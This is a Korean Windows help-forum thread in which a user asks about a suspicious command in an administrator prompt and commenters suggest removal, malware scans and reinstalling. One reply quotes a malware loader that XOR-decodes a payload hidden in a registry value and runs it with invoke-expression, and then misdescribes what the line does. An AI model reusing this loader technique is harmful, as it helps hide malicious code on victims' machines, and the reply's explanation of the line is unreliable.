윈 도 우 몇일 전부터 윈도우에 이상한게 뜨네요 고수님들 알려주세요
2022.11.20 20:09
안녕하세요
몇일전부터 관리자명령프롬프트에 이상한게 자꾸뜨네요
Windows 11 Pro 22H2 22621.891 사용중입니다.
바이러스같기도하고 해킹같기도하고 모르겠습니다.
해결방법 부탁드립니다.
댓글 [5]
-
내꼬 2022.11.20 20:18 -
왕캔디 2022.11.20 20:27
바이러스인지 해킹인지 잘모르겠네요
재설치방법말고는 해결방법 없을까요? 알려주세요
-
zerojiddu 2022.11.20 22:28 일단 그코드를 실행시킨 건, .ps1 가 아닌 .bat 이나 .cmd 배치파일이구요.
그파일을 찾아서 삭제하세요.
배치파일내 파워쉘 문구를 실행시킨건데 아래와 같습니다.
invoke-expression "invoke-command ([scriptblock]::create([string]::join('', ((get-itemproperty -path 'HKLM:\Software\Microsoft\dRcy').'wDRcyIZ' | % { [CHAR]($_ -bXOR 70) }))))"
레지스트리 키에 하위키를 만들어서 그키에 비트값을 반복적으로 만드는 코드예요.
이 파워쉘 코드는 hklm\software\microsoft\dRcy 라는 레지스트리 키가 이미 있어야 에러가 안뜨구요.
문구중 'wDRcyIZ' 에 따옴표가 들어가 있는데, 이것도 에러가 뜨는 잘못된 표현이예요.
저 레지키는 정체불명의 키라 찾아서 삭제하세요.
그리고 파워쉘 디버그 모드에 들어갔는데, 저도 안들어가 본 모드고
일반적으로 전혀 필요하지 않아요.
-
windows97 2022.11.21 02:28 혹시 모르니 멀웨어제로나 멀웨어바이트, MRT같은거 돌려보세요
-
왕캔디 2022.11.21 04:56
어떻게 해야될찌 방법을 모르겠습니다.
최근 포럼 자료실이나 타 어둠 경로에서 리팩/포터블 버전 사용 하지 마세요.
작동 여부는 사용자 환경마다 다르니 감염 여부는 알 수 없어요
해결 방법 모르신다면 재설치 권장 합니다.
이 경고 댓글이 마지막 입니다.